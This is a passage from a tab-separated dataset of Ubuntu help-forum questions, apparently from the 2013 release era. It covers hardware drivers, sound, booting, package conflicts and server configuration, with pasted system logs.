) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] flags : bus master , fast devsel , latency 0 , irq 17 memory at f69fc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : wl thanks grimpitch . your help and a youtube video showing me that i had to change bios on my model dell after switching to linux got it .
290805	disable recommendation on application lens	for some reason , my choice of disabling display for uninstalled applications is not a reminder during sessions . even though i choose it all the time . it makes the application lens dead slow on first runs .
290810	how to add gksudo or what to use instead in ubuntu 13.04 ?	i used to use gksudo gedit /etc/something.conf to edit system configuration files but this does n't seem to work any more . looks like there is no gksudo in 13.04 . how can i add it back or what am i intended to use instead ?
290811	setting up router with dsl dialer	ok i have a dsl connection at my home . the isp has given me a username , a password and the service name . it is a pppoe connection . i get an ethernet cable from the isp , which i have directly plugged in my ubuntu 12.04 machine . i dial using ubuntu 's default network manager dsl connection . which is basically pppoeconf . so i have a router linksys wrt54g , on which i have installed dd-wrt . i want to hook up my internet to the wifi , but i need to dial before i can use the internet . can someone please help me with this . my machine has just one working ethernet port . what would i have to do , which will enable me to dial via the router ( i will need a modem for that ) , or dial via my system , but when the connection has been dialed via my system , and my system stays on , i must be able to use wifi .
290813	poor performance for vmware workstation 8.0 with ubuntu 12.04 on thinkpad w530	i am having thinkpad w530 with 16 mb ram and it has intel core i7 processor . i just installed vmware workstation 8.0 and i created a virtual machine for windows 7.0 . the performance of the virtual machine is very very slow , as i was using vmware player 4.0 before with a vm of windows xp and it was great on another think pad with only 8 mb ram . i wonder if there is some mistake or some missing configuration that i need to do . here are my settings for the vm of windows 7.0 memory 8gb processor 4 virtualization engine ; automatic network adaptor : nat i wonder if any one can help me to fix this performance problem
290816	problems installing nitro application ?	i installed nitro using apt-get . however , it is dependent of gir1.2-launchpad-integration-3.0 and is missing . how can i get the source code of gir1.2-launchpad-integration-3.0 somehow and install it on my computer ? ~ $ sudo apt-get install nitro reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nitro : depends : gir1.2-launchpad-integration-3.0 but it is not installable e : unable to correct problems , you have held broken packages . it does not work if you want to try to install it at the ubuntu application store .
290818	no sound in flash player but html5 player is fine	sound on my notebook is working fine , but when i visit youtube and play a video using flash , the video runs fine but without sound . if i play same video with html5 player , sound is back . any ideas ? linux version : rafael @ rafa-note : ~ $ uname -- all linux rafa-note 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux my version of ubuntu : rafael @ rafa-note : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring my modules : rafael @ rafa-note : ~ $ lsmod module size used by snd_hda_codec_hdmi 36913 1 snd_hda_codec_realtek 78399 1 cdc_acm 26898 0 uvcvideo 80847 0 videobuf2_vmalloc 13056 1 uvcvideo videobuf2_memops 13202 1 videobuf2_vmalloc videobuf2_core 40513 1 uvcvideo videodev 129260 2 uvcvideo , videobuf2_core parport_pc 28152 0 ppdev 17073 0 coretemp 13355 0 kvm_intel 132891 0 kvm 443165 1 kvm_intel bnep 18036 2 rfcomm 42641 0 bluetooth 228619 10 bnep , rfcomm snd_hda_intel 39619 3 snd_hda_codec 136453 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 97451 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30180 1 snd_seq_midi microcode 22881 0 snd_seq 61554 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29425 2 snd_pcm , snd_seq psmouse 95870 0 intel_ips 17978 0 serio_raw 13215 0 i915 600351 3 lpc_ich 17061 0 drm_kms_helper 49394 1 i915 drm 286313 4 i915 , drm_kms_helper snd 68876 16 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device ndiswrapper 283323 0 soundcore 12680 1 snd mei 41158 0 i2c_algo_bit 13413 1 i915 topstar_laptop 12837 0 sparse_keymap 13890 1 topstar_laptop binfmt_misc 17500 1 video 19390 1 i915 mac_hid 13205 0 lp 17759 0 parport 46345 3 lp , ppdev , parport_pc hid_generic 12540 0 usbhid 47074 0 hid 101002 2 hid_generic , usbhid usb_storage 57204 0 r8169 67446 0 ahci 25731 3 libahci 31364 1 ahci solution : sudo apt-get install pulseaudio rafael @ rafa-note : ~ $ sudo gstreamer-properties in plugin : set pulseaudio
290819	how do i get the bcm 4312 wireless card working on a dell mini 10v ?	i have looked at other posts similar to this , but no solution helped . i upgraded to 13.04 on a dell inspiron mini 10v . now i do n't have wifi connectivity . it is absolutely essential that i have wifi on this computer . i 've tried the code suggested at this link , dell 3721 wifi problem ubuntu 13.04 but it did n't work . what can i do ? i think this is the extra information needed : *-network unclaimed description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0100000-f0103fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 02 serial : 00:24 : e8 : f2:4c : c5 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=192.168.11.9 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : f0510000-f0510fff memory : f0500000-f050ffff memory : f0520000-f053ffff
290823	poor performance when opening windows on new pc	i have just installed linux on a new pc . i have a cd of windows drivers - things seem to run ok , but windows open really slowly ( like chug , chug , chug ) , and menus expand slowly , so presumably it 's a graphics driver issue . i am new to everything linux and have no idea what to do . specs are : intel atom d2550 processor , intel gma3650 graphics accelerator , realtek alc662/661 onboard audio , dual broadcom 57788 gigabit ethernet ports , 8gb ram . any help would be appreciated . thanks !
290824	how to extract saved password from remmina ?	i do n't remember my password for one of my servers . i have a working connection saved and want to get the password from it . from remmina faq : q : how are my passwords stored ? are they secure ? a : they are encrypted using 3des with a 256bit randomly generated key . you should keep your key secure . so where do i get the key and where would the passwords be stored ? edit : ok found that they are just in your users home folder under .remmina . both the private key are in base64 and i ca n't seem to get the password right when decrypting ... ...
290830	webcam not identified on lenovo ideapad y580	i recently installed ubuntu 13.04 on my lenove ideapad y580 and google talk to make a video call only to find out that the camera is not working . this problem did not occur when running ubuntu 12.04 and 12.10 . what i did was ran : gstreamer-properties and this is what i got : ( gstreamer-properties:6510 ) : gtk-warning * : unknown property : gtkdialog.has-separator ( gstreamer-properties:6510 ) : gtk-warning * : unknown property : gtkdialog.has-separator gstreamer-properties-message : skipping unavailable plugin 'artsdsink' gstreamer-properties-message : skipping unavailable plugin 'esdsink' gstreamer-properties-message : skipping unavailable plugin 'sunaudiosink' gstreamer-properties-message : skipping unavailable plugin 'glimagesink' gstreamer-properties-message : skipping unavailable plugin 'sdlvideosink' gstreamer-properties-message : skipping unavailable plugin 'v4lmjpegsrc' gstreamer-properties-message : skipping unavailable plugin 'qcamsrc' gstreamer-properties-message : skipping unavailable plugin 'v4lsrc' gstreamer-properties-message : skipping unavailable plugin 'esdmon' gstreamer-properties-message : skipping unavailable plugin 'sunaudiosrc' gstreamer-properties-message : error running pipeline 'video for linux 2 ( v4l2 ) ' : can not identify device '/dev/video0 ' . [ v4l2_calls.c ( 493 ) : gst_v4l2_open ( ) : /gstpipeline : pipeline0/gstv4l2src : v4l2src1 : system error : no such file or directory ] according to lenovo support ( http : //support.lenovo.com/en_ca/research/hints-or-tips/detail.page ? & docid=ht073649 ) this computer uses an azurewave webcam . additional information uname -r3.8.0-19-generic lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0489 : e042 foxconn / hon hai bus 002 device 007 : id 13d3:5162 imc networks lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gtx 660m ] ( rev a1 ) 02:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 08 ) 03:00.0 network controller : intel corporation centrino wireless-n 2200 ( rev c4 ) 04:00.0 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 30 ) 04:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 30 ) 04:00.3 system peripheral : jmicron technology corp. ms host controller ( rev 30 ) 04:00.4 system peripheral : jmicron technology corp. xd host controller ( rev 30 )
290832	no sound ! resolution incorrect !	i upgraded to ubuntu 13.04 and i ca n't get my sound to work or my resolution up to 1920x1080p . i am using the hdmi output . the nvidia x server driver is n't working and wont install . system : zotac atom ion itx series 1.6 ghz 4 gb ram corsair force gt ssd
290839	how can i fix it so my system does n't crash whenever i go to `` system settings > details '' ?	how can i fix it so my system does n't crash whenever i go to `` system settings > details '' ? or even where/how would i go about troubleshooting the issue ? thanks ! edit : when running control center from the terminal and then clicking on `` details '' i get the following : ( gnome-control-center:9579 ) : info-cc-panel-warning ** : packagekit version 7.4.0 not supported opengl warning : glflushvertexarrayrangenv not found in mesa table opengl warning : glvertexarrayrangenv not found in mesa table opengl warning : glcombinerinputnv not found in mesa table opengl warning : glcombineroutputnv not found in mesa table opengl warning : glcombinerparameterfnv not found in mesa table opengl warning : glcombinerparameterfvnv not found in mesa table opengl warning : glcombinerparameterinv not found in mesa table opengl warning : glcombinerparameterivnv not found in mesa table opengl warning : glfinalcombinerinputnv not found in mesa table opengl warning : glgetcombinerinputparameterfvnv not found in mesa table opengl warning : glgetcombinerinputparameterivnv not found in mesa table opengl warning : glgetcombineroutputparameterfvnv not found in mesa table opengl warning : glgetcombineroutputparameterivnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterfvnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterivnv not found in mesa table opengl warning : gldeletefencesnv not found in mesa table opengl warning : glfinishfencenv not found in mesa table opengl warning : glgenfencesnv not found in mesa table opengl warning : glgetfenceivnv not found in mesa table opengl warning : glisfencenv not found in mesa table opengl warning : glsetfencenv not found in mesa table opengl warning : gltestfencenv not found in mesa table opengl warning : xgetvisualinfo returned 0 visuals for 0xb8625e50 opengl warning : retry with 0x8002 returned 0 visuals segmentation fault ( core dumped )
290841	problem with creating folders on gnome app menu on gnome 3.8	trying to create appfolders by dragging one icon to the next but nothing seem to work . i am running gnome 3.8 .
290844	slow ruby 2.0 in 13.04	i had ruby 2.0.0-p0 working with ubuntu 12.10 , in which a test suite of mine runs in about 3 minutes . the same test suite takes about 7 min to complete with ruby 2.0.0-p0 in ubuntu 13.04 . i 'm wondering if something changed on ubuntu side that could be causing that . my machine is a hp probook with core i5 , 4gb ram , an ssd disk of 180gb . my environment consist on rbenv to manage ruby versions , and they are installed through ruby-build . any clues ?
290845	how to run an android emulator in ubuntu 13.04	is there any way of doing this in 13.04 ? if so , can you also provide a step-by-step instruction on how to do it ?
290847	set up php and django virtualhosts on a single apache2 server	here is the problem : i want to host several development projects in zend , drupal , and django on a single apache2 server . while i have had this working in the past , the method of getting it to work was messy . how does one set up django and php in separate virtualhosts ( configs in /etc/sites-available ) for separate projects ? edit i should have mentioned my setup : i will be using a single version of django across multiple sites , installed from ubuntu 's repositories in ubuntu 13.04 ( django 1.4 ; in the repositories , 1.4.5-1 ) . i will be using multiple versions of zend and drupal , but this should make no difference as each project can contain it 's own libraries without causing any issues with other projects . i am using apache2 with mod_wsgi .
290850	vlc freezes when trying to play large files on networked windows share	i have a windows 7 machine with a shared drive that holds much of my media . i have another ubuntu ( 13.04 ) machine hooked to my television that i also use to play the movies . i 've noticed that when i open movies in vlc that are in the 300-400 mb range , it pauses a few seconds at startup , but generally plays fine after that . but for movies greater than ~1gb , vlc does the same pause at startup except it never recovers . occasionally it will begin to play the first second or two , and then stop . in the gnome bar across the top of the screen , a vlc icon will be displayed and it wo n't respond to `` quit '' commands . if i copy the movie locally , vlc will play them just fine . has anyone seen this before ? is there some way to fix it ?
290863	ca n't boot ubuntu after hard reset . ( grub issues )	i have a laptop with both windows 7 and ubuntu 12.04 installed . windows crashed , and i have to get a repair disk for it , so in the meantime , i 'm using ubuntu , however when i went to boot ubuntu i got a grub interface . if i command boot it just tells me i need to load the kernel first . this is my last option , is there any way i can fix this and just get ubuntu back ? i 'll mention here that this happened after i was forced to do a hard reset on the machine . it may actually be 12.10 , but i 'm not positive .
290865	how do i use 2 video boards on dell xps 15 ?	can i make ubuntu 12.10 or 13.04 use both nvidia and intel graphics processor ? and how do i do that ?
290867	possible using 64-bit on 32-bit processor ?	i have a pc ( yet old ) using amd processor . i 've tried booting ubuntu x64 from liveusb , but it works ! larger image why ? but in my windows device manager it shows x86 ...
290871	publishing in ubuntu software center	i have created a game application in visual studio 2010 and would like to publish in ubuntu software center . will i able to do that ? thanks for your suggestions .
290874	has behaviour of upstart changed in 13.04	i have an upstart conf that mounts a remote nfs at startup . previously ( in 12.10 ) it used start on ( local-filesystems and net-device-up iface=eth0 ) in 13.04 this no longer works - i tried all variants you can think of eg , runlevels , iface= ! lo etc . to get it to work on 13.04 , i changed back to the original start on , but used a script with a sleep 10 before the mount - this worked . has something changed in 13.04 that affects this behaviour ?
290878	what parts of ubuntu are not written to often ?	i 'm thinking of purchasing a solid state drive for my computer , to install my operating systems on . it 's my understanding that ssds do n't like being written to often , so i want to make sure that the drive is n't written to more than necessary .
290884	blacklist.conf `` ignoring bad line boot prompt ''	alright ubuntu wizards , i jacked up my system a bit unnecessarily , which is now giving me the chance to learn more about how to fix it ... a vicious cycle . anyway , i have it mostly up and running again to my liking , though i am receiving this ( photo attached ) prompt when my system boots : libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/blacklist.conf line 56 : ignoring bad line starting with 'rt2800usb' other users had success with just deleting the bad line from their blacklist.conf file , which i have done . line 56 no longer exists , but i 'm still receiving the same error . so am i missing something ? is there some follow-up command i need to give ubuntu after saving the conf file ?
290885	hp g85 not printing with ubuntu 13.04 the hp g85 is installed but it has a communication error 5012	hp g85 not printing with ubuntu 13.04 the hp g85 is installed but it has a communication error 5012 . i installed hplip-3.13.4 the printing is halted .
290890	is it worth upgrading from 12.04 lts to 13.04	i am running 12.04 lts smoothly with all updates intact for over 8 months and did n't upgrade to 12.10 . i recently learned from some where that if i need to upgrade to 13.04 , i should upgrade to 12.10 first and then to 13.04 . i was curious if it was worth taking the effort for the upgrade ?
290892	wired net not working after upgrading to ubuntu 13.04	yesterday i upgraded to ubuntu 13.04 from 12.10 on my dell latitude d520 laptop , but then my cable internet stopped working . its working with live cd but when installed , it does n't work . simarjit @ simar-lapi : ~ $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:7001 errors:0 dropped:0 overruns:0 frame:0 tx packets:7001 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:573938 ( 573.9 kb ) tx bytes:573938 ( 573.9 kb ) ppp0 link encap : point-to-point protocol inet addr:115.241.157.174 p-t-p:220.224.141.129 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:1121 errors:24 dropped:0 overruns:0 frame:0 tx packets:1146 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:969495 ( 969.4 kb ) tx bytes:111813 ( 111.8 kb )
290893	wine installation stalls at `` configuring ttf-mscorefonts-installer ''	i 'm new to ubuntu . i 've installed ubuntu 13.04 . when i try to install wine , after downloading , in the terminal it shows configuring ttf-mscorefonts-installer and then nothing is happening . after that , i am not able to install other softwares as well . i 've reinstalled ubuntu once . but the same problem occurs when i install wine . how do i fix this ? thanks
290894	problem when i try to install ubuntu	when i try to install ubuntu i got this error : the ext4 file system creation in partition # 1 of scsi3 ( 0,0,0 ) ( sda ) failed i boot from usb . can anyone tell me how to fix this ? : d
290897	ca n't assess grub on dual boot windows 8 and ubuntu 12.04 without shutting down windows and powering on again	i have a hp envy dv6 pc on which i just dual booted ubuntu 12.04lts with the pre-installed windows 8. problem now is that i ca n't assess grub and thus boot ubuntu without having to shut down windows , start up , and then choose the option to boot from notebook hard drive . i have enabled legacy boot and disabled secure boot in bios settings . nb : i am new to ubuntu and have minimal programming experience .
290898	how to mount a shared folder of a windows system in ubuntu permanently ?	i need to mount a shared folder of a windows system in ubuntu with read / write permission permanently . how do i do that ? note : the windows system is connected to domain . say the ubuntu system has only one user account without sudo permission . we use root account for system modifications .
290904	vmware 9 install not opening after extraction on 13.04	a bit of a linux noob here , i 'm trying to get vmware installed and i 've finally gotten to the point where i can leave terminal and do the easy work lol , but now i 'm stuck again . i followed these instructions and when i get to this part where it extracts the folder the installer does n't open . i tried running vmware-modconfig -- console -- install-all in the terminal but the last line says something like `` could not install all modules check log for details '' the last lines of the log file say : xâ defined but not used [ -wunused-function ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /tmp/modconfig-exleke/vmci-only/linux/driver.o ] error 1 make [ 2 ] : *** waiting for unfinished jobs ... . make [ 1 ] : *** [ _module_/tmp/modconfig-exleke/vmci-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic ' make : *** [ vmci.ko ] error 2 make : leaving directory `/tmp/modconfig-exleke/vmci-only ' unable to install all modules . see log for details . a user in chat said it looked like a problem with the kernel modules . how can i get vmware workstation 9 to install under ubuntu 13.04 , kernel 3.8.0-19-generic ?
290913	ubuntu running slow on my good machine !	its fixed now : ) i just installed ubuntu on my pc . i lag a lot . my pc runs all other os ' at high speed , but ubuntu lags like hell . it worked on my old laptop . my specs : xfx amd radeon hd 7870 black edition amd a8-3800 apu 2x4 gb 1333 mhz ram 1tb harddrive i installed the latest version of ubuntu . 13.04 i believe . i run windows and other linux distros really fast , so why does ubuntu lag ?
290914	ca n't access function after chown command	i was using this command chown root : www-data /var/www/example.com -r , but there was a message shown that directory not listed .
290916	error opening cache e : read error -read ( 5 : input/output error )	i tried to install 13.04 after downloading and burning on a boot disc , or 12.04 from a disc from a magazine over windows 7 on a netbook but got the following code an error occurred , please run package manager from the right click menu or apt-get in a terminal to see what is wrong . the error message was error opening the cache ( e : read error - read ( 5 : input/output error ) , e the package lists or status file could not be parsed or opened ) when i open 13.04 i get a message disk drive for /tmp not ready once the system has final booted up a number of software items do n't run and it varies from time to time which do n't .
290921	lubuntu 12.04 no lts ?	does not make sense , because that all the variants sync the same repositories , so will i get software updates for 3 or 4 more years if i use lubuntu 12.04 , how could it be not an lts ? evenb mint 13 is lts
290924	my ubuntu 13.04 keeps freezing	i have just installed ubuntu 13.04 on my pc dual-booting it with windows 7 , then reboots but when i start to use ubuntu for about 20 mins it freezes every thing but the mouse . the keyboard does n't work and i cant use the mouse to click everything , then crashes nothing loads my pc specs are specs ram : 2gb processor : 1.6 intel atom 32bit operating system
290926	ca n't install apache on ubuntu 13.04	i have apache files downloaded , and i 've not been able to install the , it keeps listing dependencies and when i check my list of installed packages , it lists apache2 as deinstall , i equally have not been able to run mysql either . what should i do , because the system is not connected to the internet .
290927	why no sip facility in 13.04 ?	i was able to use my plusnet broadband phone in empathy 1204 , but the facility does n't seem to be available in 13.04 . i have checked that telepathy sofiasip is installed .
290930	why did ubuntu fail , given that the installation was successful ?	i just tried installing ubuntu 12.04 on my new laptop , dual-booting alongside windows 8 , i burnt the iso to a cd-r and installed it . the installation went fine , i got up to the part where it told me to take the disk out and press enter to restart my pc . but now when it has started , it simply says `` repairing disk errors . this might take over an hour to complete . '' i followed the installation instructions exactly , and yet i know can not access my laptop . can anyone give me some idea of how to repair this . just in case it is helpful , the laptops specs are 8g ram , amd 10 quad core processor , 750g hard drive .
290936	sudoers nopasswd for command not working but all is	i 've been trying to grant www-data to use sudo service apache2 restart without a password but no matter what i try , nothing works . i have read a few hundred posts regarding this issue on different forums but nothing in them helps . i know that the permissions are added in order , so the specific command should go at the end of the list . here is my file : # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d % www-data all= ( all ) nopasswd : /usr/sbin/service apache2 restart from what i gather , anyone in www-data should now be able to run sudo service apache2 restart and not require a password . it still asks for a password . i have tried to add : % www-data all= ( all ) nopasswd : all and that works as expected . i can give them no password for all commands but not for one . of course that would be really bad idea . any help would be appreciated . this is the latest version of ubuntu
290937	what is the best directory for script files ?	i have my own shell script files and i want to run them in terminal , keeping them in /usr/bin folder . but my question is : which directory is best for keeping files of my own script ? i want to use this files when i call my script in terminal . /opt , /usr/local , e.t.c . which is the best choise ?
290940	no audio since upgrade to 13.04	well , not really . its a gamble actually . when booting , kernel module responsible for audio sometimes loads and sometimes crashes . after several reboots i get the sound . here 's dmesg : http : //paste.ubuntu.com/5634866/ i tried sudo alsa force-reload but it hangs for 10 minutes already . i 'm fairly sure nothing is happening . any ideas ?
290943	transmission-daemon : error loading working config-file . user priveliges ?	transmission-daemon has worked perfectly on a small headless server for a long time . however , it currently gives me the following error : transmission-daemon error loading config file -- exiting . ( daemon.c:462 ) due to problems with permissions , all daemons are running as the user `` robots '' all config files are owned by `` robots '' and by the group `` robots '' of which i am a member . for debugging purposes i tried running the daemon under my own account transmission-daemon -f -- log-debug -g /etc/transmission-daemon/ the daemon started succesfully without errors . from this i conclude that the configfile itself is ok. ( i also tested this by substituting user=robots by user=lars the results remain the same ; the daemon runs without errors . the config files in /etc/transmission-daemon /etc/init.d/ and /etc/defaults/ are all working fine when the daemon is running under my name . i changed the permissions of the /etc/transmission-daemon/ and all the files and folders within to 777 , and changed the owner and group back to robots . ( because running the daemon under the name `` lars '' changes the ownership of the configfiles to `` lars '' . chmod 777 -r /etc/transmission-daemon/ chown robots : robots -r /etc/transmission-daemon/ chmod 777 /etc/defaults/transmission-daemon chown robots : robots /etc/defaults/transmission-daemon without succes ... the daemon exits with the same error as stated above . i do n't know what i 'm missing here , does anybody have an idea ? thanks in advance
290949	installing ubuntu on another hard drive disk ( f : )	i want to install ubuntu side by side on my windows xp.but instead of placing it on hdd c : drive , i want to place it on a slave hdd ( which would be drive f : ) .i already tested on a virtual machine in placing on a second hdd but it does n't appear to work . how should i proceed ?
290950	mysql-client-core-5.5 : breaks : mysql-client ( < 5.5.31-0ubuntu0.12.04.1 )	the automatic security update broke my mysql installation and i do n't understand how to fix it . as far as i can tell the packages mysql-client-core-5.5 and mysql-client are on the same versio0n 5.5.31 . but core requires that the client remains on an older version . apt-get upgrade you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : mysql-client-core-5.5 : breaks : mysql-client ( < 5.5.31-0ubuntu0.12.04.1 ) e : unmet dependencies . try using -f. apt-show-versions -a mysql-client mysql-client 5.5.29-0ubuntu0.12.04.2 install ok unpacked mysql-client 5.5.22-0ubuntu1 precise de.archive.ubuntu.com mysql-client 5.5.31-0ubuntu0.12.04.1 precise-security security.ubuntu.com mysql-client/precise-security upgradeable from 5.5.29-0ubuntu0.12.04.2 to 5.5.31-0ubuntu0.12.04.1 apt-show-versions -a mysql-client-core-5.5 mysql-client-core-5.5 5.5.31-0ubuntu0.12.04.1 install ok installed mysql-client-core-5.5 5.5.22-0ubuntu1 precise de.archive.ubuntu.com mysql-client-core-5.5 5.5.31-0ubuntu0.12.04.1 precise-security security.ubuntu.com mysql-client-core-5.5/precise-security uptodate 5.5.31-0ubuntu0.12.04.1 apt-get -f install the following extra packages will be installed : mysql-client the following packages will be upgraded : mysql-client 1 upgraded , 0 newly installed , 0 to remove and 31 not upgraded . 1 not fully installed or removed . dpkg : dependency problems prevent configuration of mysql-client : mysql-client-core-5.5 ( 5.5.31-0ubuntu0.12.04.1 ) breaks mysql-client ( < < 5.5.31-0ubuntu0.12.04.1 ) and is installed . version of mysql-client to be configured is 5.5.29-0ubuntu0.12.04.2 . dpkg : error processing mysql-client ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mysql-client e : sub-process /usr/bin/dpkg returned an error code ( 1 )
290951	starting preload	i just installed preload . i found , that sudo /etc/init.d/preload start command is starting it - i need to do it after every boot up ? maybe it 's starting automatically ? if not - how can i set it to do it ?
290957	custom keyboard options do not work	i have been trying to get the custom keyboard options to work . for example , to get the number 4 key to replace currency us $ by the inr ( âš ) sign . the option is there in the custom keyboard options in 13.04 . but this does not seem to work . any ideas how to get this working ? please see the below screenshot .
290958	oracle virtualbox - can it use iso-files ?	i currently run windows 7 and have ubuntu 13.04 saved on my pc as a .iso file , i think it failed to download , but it would n't run in oracle virtual box , does this type of file work well in the virtual pc ? i 'm re-downloading 12.04 instead but my internet is very slow and the download is seeming endless for me , so hopefully it works
290963	how to execute forcedeth at startup ?	i 'm trying to add the line exec rommod forcedeth in the file /etc/init/module-init-tools.conf and then add the line modprobe forcedeth msi=0 msix=0 to /etc/rc.local but when i try the first command it says not such file or directory , i 'm trying to do all this because im trying to enable networking at startup because there is a bug with the drivers for my motherboard my system specs are : board : n68c-gs fx processor : amd fx eight core processor 3.6 ghz im running ubuntu 13.04 can please someone help me ?
290964	install program from terminal	i want to install proxychains from terminal and the code is apt-get install proxychains but it said could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? how can i fix this ?
290970	error when trying to install google chrome	i have problems when trying to install google chrome on ubuntu software center and terminal . on ubuntu software center on terminal how do i install google chrome ? update i have tried sudo apt-get install libxss1 libudev0 but i got this :
290971	how to capture from hdmi with ubuntu ?	there seem to be some hdmi pcie video capture cards around , but only some of them are stated to support linux , and those are often stated to not support video4linux . so how to capture then ? does anyone know a video4linux supporting device to capture hdmi ?
290972	unable to ping , nothing except askubuntu opening	everything was going fine , and there were no new installs or updates . but suddenly my wireless started giving me issues . it connects fine , but i am unable to open anything ( not even google ) , or ping anything . the network strength shows just 1 bar ( weak signal ) even though it should be strong ( am near the router ) . sometimes when it does work , its too slow to load the complete page . strangely though , i am having absolutely no problems browsing and posting to askubuntu.com !
290976	alsa works in virtual console but not in x windows	after booting my computer and logging in on a virtual console the aplay command works as expected but after running startx only root can run aplay . as non-root i get the following error message : $ aplay foo.wav alsa lib pcm_hw.c:1401 : ( _snd_pcm_hw_open ) invalid value for card aplay : main:682 : audio open error : no such device any clues ?
290977	grep : how to show only one word after found one ?	i would like to write a script to disable keyboard . i write xinput disable 13 as built-in keyboard 's id = 13 . but what if the 'id ' changes somehow ? then it wo n't work anymore . that 's why i have to write better script , the one that uses grep . for now , i got this xinput list|grep at|grep id= âł at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] i added cut -f 2 to my command , so it displays this > id=13 so , for now , i got 'id=13 ' , but i need only 13 , without id= , so i could assign that value to some variable , to pass it to xinput disable $ variable can someone help me to complete my script ?
290979	how can i get skype to work in ubuntu 13.04 64-bit ?	it worked before , but i reinstalled ubuntu , and now i ca n't get it to run when i install it . it simply does n't run . update : i found the solution here .
